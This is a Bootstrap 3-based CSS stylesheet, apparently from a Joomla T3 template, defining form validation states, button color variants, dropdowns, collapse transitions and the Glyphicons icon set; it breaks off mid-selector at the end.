.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: right;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #005788;
  border-color: #001622;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #005788;
  border-color: #004064;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #005788;
  background-image: none;
  border-color: #004064;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #004064;
  border-color: #001622;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #0077bb;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #00466e;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: left;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
